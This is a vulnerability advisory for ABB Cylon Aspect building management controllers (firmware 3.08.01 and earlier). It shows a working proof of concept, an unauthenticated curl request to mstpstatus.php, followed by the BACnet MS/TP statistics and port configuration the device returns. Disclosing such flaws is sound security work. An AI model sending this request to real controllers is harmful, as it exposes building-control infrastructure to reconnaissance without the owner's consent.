ABB Cylon Aspect version 3.08.01 suffers from an unauthenticated information disclosure vulnerability. An unauthorized attacker can reference the affected page and disclose various BACnet MS/TP statistics running on the device.
401fb887776d514d63369b3b8c3ccac1e8c60f72e1af99315a52566d675274c2
ABB Cylon Aspect 3.08.01 (mstpstatus.php) Information Disclosure
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.01
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB BMS/BAS controller suffers from an unauthenticated information
disclosure vulnerability. An unauthorized attacker can reference the affected
page and disclose various BACnet MS/TP statistics running on the device.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5865
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5865.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl http://192.168.73.31/mstpstatus.php
Thu Nov 28 10:13:51 UTC 2024<br><div id='Port 0Stat' class='portStats'><div id='Port 0Load'>Port 0 Load: 123 Average time (ms) to wait for token return
47 Average time (ms) to wait for for a reply
20 Max info frames
1063 Estimated time for max_nfo_frmaes tx plus token cycle (ms)
18 Estimated max rate (trasactions per sec)
38 congestion threashold
%</div><div id='Port 0BPSTotal'>Port 0 BPS (Total): </div><div id='Port 0BPSOurs'>Port 0 BPS (Mine): </div></div><div id='Port 1Stat' class='portStats'><div id='Port 1Load'>Port 1 Load: 34 Average time (ms) to wait for token return
40 Average time (ms) to wait for for a reply
20 Max info frames
834 Estimated time for max_nfo_frmaes tx plus token cycle (ms)
23 Estimated max rate (trasactions per sec)
48 congestion threashold
%</div><div id='Port 1BPSTotal'>Port 1 BPS (Total): </div><div id='Port 1BPSOurs'>Port 1 BPS (Mine): </div></div><br />
$Id: mstp.ko R_03_05_01 Thu Sep 23 09:30:32 EDT 2021 $ <br />
Proto: 0<br />
<br />
Port 0 Statistics =======================<br />
Baud Rate: 38400<br />
RX Characters: 60521<br />
RX echoes: 0<br />
RX Errors: 31<br />
TX Characters: 49671<br />
Echo detect fails: 0<br />
<br />
Port 0 MSTP State =======================<br />
ValidRXFrameCnt: 42320<br />
InvdRXFrameCnt: 61<br />
rxDataFrames: 16558<br />
rxToken: 29242<br />
TXFrameCnt: 2072<br />
TXQueCnt: 1<br />
CongestionCnt: 0<br />
Poll_Station: 0<br />
SoleMaster: FALSE<br />
<br />
Port 0 config =======================<br />
Nmax_master: 127<br />
Nmax_info_frames: 20<br />
This_Station: 0<br />
Tno_token: 500<br />
Tusage timeout 30<br />
congestion (auto): 38<br />
Npoll: 50<br />
<br />
<br />
Port 1 Statistics =======================<br />
Baud Rate: 38400<br />
RX Characters: 0<br />
RX echoes: 0<br />
RX Errors: 0<br />
TX Characters: 33632<br />
Echo detect fails: 0<br />
<br />
Port 1 MSTP State =======================<br />
ValidRXFrameCnt: 0<br />
InvdRXFrameCnt: 0<br />
rxDataFrames: 0<br />
rxToken: 0<br />
TXFrameCnt: 2<br />
TXQueCnt: 0<br />
CongestionCnt: 0<br />
Poll_Station: 29<br />
SoleMaster: TRUE<br />
<br />
Port 1 config =======================<br />
Nmax_master: 127<br />
Nmax_info_frames: 20<br />
This_Station: 0<br />
Tno_token: 500<br />
Tusage timeout 30<br />
congestion (auto): 48<br />
Npoll: 50<br />
<br />
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed